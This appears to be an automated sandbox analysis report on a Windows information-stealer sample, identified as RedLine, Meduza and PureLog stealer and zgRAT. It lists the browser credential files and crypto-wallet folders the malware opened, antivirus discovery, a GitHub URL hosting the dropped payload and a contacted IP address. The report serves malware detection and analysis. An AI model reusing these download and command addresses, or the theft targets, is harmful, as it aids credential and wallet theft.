                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeQueries volume information: C:\Path1\To2\Save444\uh3ex1.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_6D5976E3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_6D5976E3
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Meduza Stealer
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 8184, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.MSBuild.exe.f00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.uh3ex1.exe.6d5ab000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.uh3ex1.exe.6d590000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1646379749.0000000000F02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Yara detected RedLine Stealer
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.MSBuild.exe.f00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.uh3ex1.exe.6d5ab000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.uh3ex1.exe.6d590000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1646379749.0000000000F02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 8184, type: MEMORYSTR
                      Yara detected zgRAT
                      Source: Yara matchFile source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.MSBuild.exe.f00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.uh3ex1.exe.6d5ab000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.uh3ex1.exe.6d590000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectronCash
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: com.liberty.jaxx
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                      Source: powershell.exe, 00000003.00000002.1475483757.0000000005904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: Yara matchFile source: 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1650116521.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 8184, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected Meduza Stealer
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 8184, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.MSBuild.exe.f00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.uh3ex1.exe.6d5ab000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.uh3ex1.exe.6d590000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1646379749.0000000000F02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Yara detected RedLine Stealer
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.MSBuild.exe.f00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.uh3ex1.exe.6d5ab000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.uh3ex1.exe.6d590000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1646379749.0000000000F02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 8184, type: MEMORYSTR
                      Yara detected zgRAT
                      Source: Yara matchFile source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.MSBuild.exe.f00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.uh3ex1.exe.6d5ab000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.uh3ex1.exe.6d590000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
                      Process Injection                      		11
                      Deobfuscate/Decode Files or Information                      		LSASS Memory2
                      File and Directory Discovery                      		Remote Desktop Protocol3
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                      Obfuscated Files or Information                      		Security Account Manager124
                      System Information Discovery                      		SMB/Windows Admin Shares1
                      Clipboard Data                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                      Software Packing                      		NTDS441
                      Security Software Discovery                      		Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Timestomp                      		LSA Secrets1
                      Process Discovery                      		SSHKeylogging13
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading                      		Cached Domain Credentials241
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
                      Virtualization/Sandbox Evasion                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                      Process Injection                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1554430 Sample: 9LrEuTWP8s.exe Startdate: 12/11/2024 Architecture: WINDOWS Score: 100 37 objects.githubusercontent.com 2->37 39 github.com 2->39 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 15 other signatures 2->53 8 9LrEuTWP8s.exe 15 9 2->8         started        signatures3 process4 dnsIp5 43 github.com 140.82.121.4, 443, 49707 GITHUBUS United States 8->43 45 objects.githubusercontent.com 185.199.111.133, 443, 49708 FASTLYUS Netherlands 8->45 31 C:\Path1\To2\Save444\uh3ex1.exe, PE32 8->31 dropped 33 C:\Users\user\AppData\...\9LrEuTWP8s.exe.log, CSV 8->33 dropped 63 Adds a directory exclusion to Windows Defender 8->63 13 uh3ex1.exe 3 8->13         started        17 powershell.exe 23 8->17         started        19 conhost.exe 8->19         started        file6 signatures7 process8 file9 35 C:\Users\user\AppData\Roaming\gdi32.dll, PE32 13->35 dropped 65 Antivirus detection for dropped file 13->65 67 Multi AV Scanner detection for dropped file 13->67 69 Machine Learning detection for dropped file 13->69 75 3 other signatures 13->75 21 MSBuild.exe 4 13->21         started        25 conhost.exe 13->25         started        71 Found many strings related to Crypto-Wallets (likely being stolen) 17->71 73 Loading BitLocker PowerShell Module 17->73 27 WmiPrvSE.exe 17->27         started        29 conhost.exe 17->29         started        signatures10 process11 dnsIp12 41 4.251.123.83, 49709, 6677 LEVEL3US United States 21->41 55 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 21->55 57 Found many strings related to Crypto-Wallets (likely being stolen) 21->57 59 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 21->59 61 3 other signatures 21->61 signatures13

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      9LrEuTWP8s.exe47%ReversingLabsWin32.Ransomware.RedLine
                      9LrEuTWP8s.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Path1\To2\Save444\uh3ex1.exe100%AviraHEUR/AGEN.1311038
                      C:\Users\user\AppData\Roaming\gdi32.dll100%Joe Sandbox ML
                      C:\Path1\To2\Save444\uh3ex1.exe100%Joe Sandbox ML
                      C:\Path1\To2\Save444\uh3ex1.exe68%ReversingLabsWin32.Trojan.Jalapeno
                      C:\Users\user\AppData\Roaming\gdi32.dll83%ReversingLabsWin32.Trojan.Tedy

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://objects.githubusercontent.comd0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      github.com
                      		140.82.121.4
                      		truefalse
                        		high
                        objects.githubusercontent.com
                        		185.199.111.133
                        		truefalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://github.com/Xavieprowel/crispy-palm-tree/releases/download/1/uh3ex1.exefalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/02/sc/sctMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://tempuri.org/MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/faulthMSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
